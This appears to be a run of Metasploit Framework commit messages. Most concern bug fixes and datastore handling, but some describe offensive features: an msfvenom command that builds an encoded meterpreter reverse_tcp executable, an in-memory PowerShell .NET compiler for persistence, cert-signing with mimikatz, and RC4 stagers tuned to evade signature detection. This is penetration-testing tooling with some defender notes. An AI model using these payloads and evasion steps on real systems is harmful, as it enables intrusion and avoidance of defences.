MS-2073
* imports are slow, mainly because of fingerprinting after every service creation
* imports now fingerprint only once, after all services have been created
cmd_psh_payload relies on datastore options having the proper
data types down the call chain. When modules are created with string
values for all datastore options, a conditional naively checking
what should be a boolean value for false/nil? returns true
for the string representation "false".
Ensure that datastore options are validated before they are used
to set variables passed into Rex methods.
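A minimal illustration of the pitfall (variable names here are
illustrative, not those used in cmd_psh_payload):

  opt = "false"                 # datastore value arrives as a String
  puts "enabled" if opt         # any non-nil String is truthy, so this prints
  # Normalizing the value first gives the intended behaviour:
  enabled = %w[true yes 1].include?(opt.to_s.strip.downcase)
  puts "enabled" if enabled     # now correctly skipped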
Allow passing the exec_in_place parameter to cmd_psh_payload in order
to execute raw PowerShell without the command-line wrappers of
comspec or a call to the powershell binary itself.
This is useful in contexts such as the web delivery mechanism or
recent PowerShell sessions, as it does not require the creation of
a new PSH instance.
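A hedged sketch of the intended usage from a module mixing in
Msf::Exploit::Powershell (the surrounding call is illustrative):

  # Returns raw PowerShell rather than a cmd.exe/powershell.exe one-liner,
  # suitable for feeding into an existing PSH instance.
  psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first,
                            exec_in_place: true)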
Add Exploit::Powershell::DotNet namespace with compiler and
runtime elevator.
Add compiler modules for payloads and custom .NET code/blocks.
==============
Powershell-based persistence module to compile .NET templates
with MSF payloads into binaries which persist on host.
Templates by @hostess (way back in 2012).
C# templates for simple binaries and a service executable with
its own install wrapper.
==============
Generic .NET compiler post module
Compiles .NET source code to binary on compromised hosts.
Useful for home-grown APT deployment, decoy creation, and other
misdirection or collection activities.
Using mimikatz (kiwi), one can also extract host-resident certs
and use them to sign the generated binary, thus creating a
locally trusted exe which helps evade certain defensive measures.
==============
Concept:
Microsoft has graciously included a compiler in every modern
version of Windows. Although compiler executables which can be easily
invoked by the user may not be present on all hosts, the
shared runtime of .NET and Powershell exposes this functionality
to all users with access to Powershell.
This commit provides a way to execute the compiler entirely in
memory, seeking to avoid disk access and the associated forensic
and defensive measures. Resulting .NET assemblies can be run
from memory, or written to disk (with the option of signing
them using a pfx cert on the host). Two basic modules are
provided to showcase the functionality and execution pipeline.
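As a rough sketch of the underlying mechanism (the PowerShell below uses
the standard .NET CodeDom APIs; how the mixin actually wires this up may
differ), a module could emit something like:

  psh = <<-PSH
    $cp = New-Object System.CodeDom.Compiler.CompilerParameters
    $cp.GenerateInMemory = $true                          # never touch disk
    $cp.ReferencedAssemblies.Add('System.dll') | Out-Null
    $provider = New-Object Microsoft.CSharp.CSharpCodeProvider
    $res = $provider.CompileAssemblyFromSource($cp, $src) # $src holds the C# source
    $res.CompiledAssembly.EntryPoint.Invoke($null, $null) # assumes a parameterless Main
  PSH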
Usage notes:
Binaries generated this way are dynamic by nature and avoid
signature-based detection. Heuristics, sandboxing, and other isolation
mechanisms must be defeated by the user for now. Play with
compiler options, included libraries, and runtime environments
for maximum entropy before you hit the templates.
Defenders should watch for:
Use of this in conjunction with WMI/PS remoting or other MSFT-native
distributed execution mechanisms, which can bring malware labs
to their knees with properly crafted templates.
The powershell code to generate the binaries also provides a
convenient method to leave behind complex trojans which are not
yet in binary form, nor will they be until execution (which can
occur strictly in memory, avoiding disk access for the final
product).
==============
On responsible disclosure: I've received some heat over the years
for prior work in this arena. Everything here is already public,
and has been in closed PRs in the R7 repo for years. The bad guys
have had this for a while (they do their homework religiously);
defenders need to be made aware of this approach and prepare
themselves to deal with it.
Differences in transport configuration and the actual payload do
not allow the original files to be spliced in directly.
Clean up the payload generator to work with the upstream handler,
payload, and transport configuration implementation.
Initial testing shows inbound sessions are created and the SSL cert
now properly attaches to the handler.
Running zipalign on an APK after signing and before distribution
is considered general best practice. Also, properly aligning an APK
makes it less likely to be flagged as suspicious by mobile security
solutions.
More on zipalign from Google:
https://developer.android.com/studio/command-line/zipalign.html
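For reference, the alignment step amounts to something like the
following (file names illustrative, 4-byte alignment per Google's
documentation):

  zipalign -f 4 signed.apk aligned.apk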
In BrowserAutoPwn2, the mixin forgets to pass the SRVPORT datastore
option to the exploits, so they always use the default 8080. As a
result, if a different SRVPORT is set, BAP2 ends up serving the
target machine bad exploit links.
Fix #7021
Users reported (in GitHub issue #7008) hitting an exception when attempting to export the contents of the msf database (i.e. workspaces, hosts, events, etc.) via the 'db_export' command. After some digging, it appears there were a few ActiveRecord changes with the new Rails upgrade that require a couple of mods to the way we are querying.
Use a convenience method to DRY up creation
of the SSHFactory inside modules. This will make it easier
to apply changes as needed in the future. Also changed the msframework attr
to just framework, as per our normal convention.
MS-1688
Add the psexec option SERVICE_STUB_ENCODER to allow a list of encoders to
encode the x86/service stub.
Add a multiple_encode_payload function in payload_generator.rb to accept a
list of encoders (beginning with @ so as not to break the classic encoder
parsing).
With this it is possible to pass multiple encoders to msfvenom in
one execution:
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80 LHOST=192.168.100.11 \
  -e @x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai \
  -x template.exe -f exe-only -o meterpreter.exe
Currently, any existing or future JCL payload has to have a 'job card':
basically, data that defines the job to z/OS. It has information about
the job's owner, the place it will run, output creation, etc. All JCL
shares the same job card format. As such, this creates a shared payload
method that allows this text to be imported into any JCL payload.
Additionally, the job card is now parameterized, allowing the
exploit/payload user to edit the job card values, as this may be needed
in order to run the job successfully on any given system.
This PR sets up the mf module - next PRs will update the existing
payloads to use this module.
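A hedged sketch of what a parameterized job card could look like (the
datastore option names here are illustrative, not the module's actual
ones):

  def jcl_jobcard
    <<-JCL
//#{datastore['JOBNAME']} JOB (#{datastore['ACTNUM']}),'#{datastore['JOBOWNER']}',
//   CLASS=#{datastore['JCLASS']},MSGCLASS=#{datastore['MSGCLASS']},
//   NOTIFY=#{datastore['NOTIFY']}
    JCL
  end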
When a module uses the HttpClient mixin but registers the USERNAME
and PASSWORD datastore options in order to perform a form auth,
it ruins the ability to also perform a basic auth (sometimes it's
possible to see both). To avoid option naming conflicts, basic auth
options are now HTTPUSERNAME and HTTPPASSWORD.
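A hedged sketch of what this looks like from a module's point of view
(the option descriptions are illustrative):

  register_options(
    [
      OptString.new('USERNAME', [true, 'Username for the login form']),
      OptString.new('PASSWORD', [true, 'Password for the login form'])
    ])
  # Basic auth, when the target also requires it, is now driven by the
  # mixin's HTTPUSERNAME/HTTPPASSWORD options instead of the two above.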
Fix #4885
Using the ruby methods for generating assembly blocks defined or
separated in prior commits, create a new payload from the existing
assembly blocks which performs a DNS lookup of the LHOST prior to
establishing a corresponding socket, then downloading and
decrypting the RC4-encrypted payload.
For anyone looking to learn how to build these payloads, these
three commits should provide a healthy primer. Small changes to
the payload structure can yield enough entropy to avoid
signature-based detection by in-line or out-of-band static defenses.
This payload was completed in the time between this commit and the last.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Using the separation of block_recv and reverse_tcp, implement
reverse_tcp_dns using the original shellcode as a template with dynamic
injection of parameters. Concatenate the whole thing in the
generation call chain, and compile the resulting shellcode for
delivery.
The Metasploit module is pruned to the bare minimum, with the LHOST
OptString moved into the library component.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Misc:
Clean up rc4.rb to use the rc4_keys method when generating a
stage. Makes the implementation far more readable and reduces
redundant code.
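A hedged sketch of the kind of helper this refers to (the exact
key-derivation details are assumed from the historical RC4 stagers and
may differ):

  # Derive the XOR key for the length field and the RC4 key for the stage
  # from a SHA-1 of the shared passphrase.
  def rc4_keys(rc4password = '')
    key = OpenSSL::Digest::SHA1.digest(rc4password)
    [key[0, 4], key[4, 16]]   # [xor_key, rc4_key]
  end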
Convert reverse_tcp_rc4 and bind_tcp_rc4 from static shellcode
substitution payloads to a metasm-compiled assembly approach.
This splits up the metasm methods for bind_tcp and reverse_tcp into
socket creation and block_recv to allow reuse of the socket methods
with the RC4 payloads, while substituting the block_recv methods
for those carrying the appropriate decryptor stubs.
It also creates a new rc4 module carrying the bulk of the decryptor and
adjacent convenience methods for standard payload generation.
Testing:
Tested against Win2k8r2, Win7x64, and WinXPx86
ToDo:
Ensure all the methods around payload sizing, UUIDs, and other
new functionality, the semantics of which I do not yet fully
understand, are appropriate and do not introduce breakage.
This method was based around a char limit
for the desc column, which no longer exists.
Trying to perform this operation generates an error,
so the method is removed since it is no longer needed.
This patch fixes two problems:
1. #6820 - If the HTTP server returns a relative path
(example: /test), there is no host to extract, so the Host
header in the HTTP request ends up empty. When the web
server sees this, it might return an HTTP 400 Bad Request, and
the redirection fails.
2. #6806 - If the HTTP server returns a relative path that begins
with a dot, send_request_cgi! will literally send that in the
GET request. Since that isn't a valid GET request path format,
the redirection fails.
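As an illustration of the two cases (this is not the actual fix, just
the shape of the normalization involved):

  location = res.headers['Location']      # e.g. "/test" or "./test"
  if location !~ %r{\Ahttps?://}          # relative redirect: no host to extract
    location = location.sub(/\A\.+/, '')  # strip leading dots so the GET path is valid
    # and keep using the original rhost/vhost instead of an empty Host header
  end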
Fix #6806, Fix #6820
Reimplement HD's work on a session interrupt handler
so that, if an exploit fails, the handler does not continue
waiting for a session that will never come.
MS-385
Before, the datastore would store options case-sensitively, but would
access them case-insensitively, resulting in a number of string compares.
This commit stores options in their downcase form to reduce
update/lookup time. This adds up to reducing msfconsole boot time by
about 10% and rspec time by about 45 sec. (!) on my box.
One tricky part of this conversion is that there are several places (in
pro and framework) where we export or otherwise access the datastore as
a plain hash (case-sensitive). I believe I have caught all the ways we
access the datastore that are case-sensitive and substituted the
original key capitalization in those cases.
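A rough sketch of the idea (assuming a Hash subclass, as Msf::DataStore
historically is; the real implementation has more to it):

  # Store keys downcased so lookups are a single hash hit rather than a
  # case-insensitive scan, but remember the original capitalization for export.
  def []=(key, value)
    k = key.to_s.downcase
    @original_keys ||= {}
    @original_keys[k] ||= key.to_s
    super(k, value)
  end

  def [](key)
    super(key.to_s.downcase)
  end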
file:/ strings are special with some datastore options, causing them to read a
file rather than emitting the exact string. This causes a couple of problems:
1. The valid? check needs to be special on assignment, since normalization
really means normalizing the path, not playing with the value as we would
for other types.
2. There are races or simply out-of-order assignments when running commands
like 'services -p 80 -R', where the datastore option is assigned before the
file is actually written.
This is the 'easy' fix of disabling assignment validation (which we didn't have
before anyway) for types that can expect a file:/ prefix.
Options without a default were not pulled into the `@options` hash and
therefore were not used to validate options on assignment.
I am not entirely sure how this fix works, since it would seem that
non-override options would not get pulled in if an option was first set
in the global datastore. However, a previous value does not get
overridden and new values are validated. Anything further is merely
speculation on my part.
The preauth fingerprinting for postgres is somewhat
unmaintainable, but due to a specific customer request
I have added these two fingerprints for 9.4.1-5.
MS-1102
Exploit::Remote::HttpServer and every descendant utilizes the
print_prefix method, which checks whether the module that mixes in
these modules is aggressive. This is done in a proc context most
of the time, since it's a callback on the underlying Rex HTTP server.
When modules do not define :aggressive?, the resulting exceptions
are quietly swallowed, and requestors get an empty response as the
client object dies off.
Add a check in :print_prefix that the module actually responds to
:aggressive? to address this issue.
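A minimal illustration of the guard (not the mixin's exact code):

  # Only consult :aggressive? when the module actually defines it.
  is_aggressive = respond_to?(:aggressive?) && aggressive?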
This pops up occasionally. This fixes a couple of anecdotal reports of missing
requires that cause the loader to fail, depending on the directory sort order.
It also fixes the problem as reported in #6460.
Fix #6445
Problem:
When an HttpServer instance is trying to register a resource that
is already taken, it causes all HttpServers to terminate, which
is not a desired behavior.
Root Cause:
It appears the Msf::Exploit::Remote::TcpServer#stop_service method
is causing the problem. When the service is detected as an
HttpServer, the #stop method used actually causes all servers to
stop, not just the specific one. This stopping route was
introduced in 04772c8946, when Juan
noticed that the java_rmi_server exploit could not be run again
after the first time.
Solution:
Special-case the stopping routine at the module level, rather than
stopping all servers universally.
def peer is a method that gets repeated a lot in modules, so we
should have it in the tcp mixin. This commit also cleans up a few
modules that use the HttpClient mixin and define their own peer.
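The shared helper amounts to the familiar one-liner:

  def peer
    "#{rhost}:#{rport}"
  end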
Fix #6371
When a browser exploit fails to bind (probably due to an invalid port or
server IP), the module actually fails to report this exception. On
exception, the method calls exploit.handle_exception(e). But since
handle_exception is not a valid method for that object, it is unable
to do so, and as a result the module fails to properly terminate,
or show any error on the console. For the user, this will
make it look like the module has started and the payload listener is up,
but there is no exploit job.
Rex::BindFailed actually isn't the only error that could be raised
by #job_run_proc. As far as I can tell, registering the same resource
again can raise one, too. With this patch, the user should be able to see
that error as well.
Since the exploit object does not have access to the methods in
Msf::Simple::Exploit, and there is no other code using
handle_exception and setup_fail_detail_from_exception, I decided
to move these to lib/msf/core/exploit.rb so they are actually
callable.
Most exploits don't check generate_payload_exe for nil; they just
assume they will always have a payload. If the method returns nil,
it ends up making debugging more difficult. Instead of checking nil
one by one, we just raise.
Platform can be determined from different sources:
1. From the opts argument. For example, when you are using
generate_payload_exe and you want to set a specific platform.
This is the most explicit, so we check it first.
2. From the metadata of a payload module. Normally, a payload module
should include the platform information, with the exception of
some generic payloads (for example: generic/shell_reverse_tcp).
This is the most trusted source.
3. From the exploit module's target.
4. From the exploit module's metadata.
Architecture shares the same lookup order (sketched below).
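A rough sketch of the fallback chain described above (the method names
are illustrative, not the actual API):

  # Most explicit source wins; fall through to progressively less specific ones.
  platform = opts[:platform] ||
             payload_module_platform ||
             exploit_target_platform ||
             exploit_module_platform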
We haven't been able to get the XML data that would cause the error; all we have is a backtrace. So "verification" is purely code reading. Thanks @wchen-r7
Fixes #6085
Merge remote-tracking branch 'origin/pr/6259'
Running a local exploit like a post is not currently supported;
we should at least raise a warning or something, and not just
let it backtrace and confuse the user.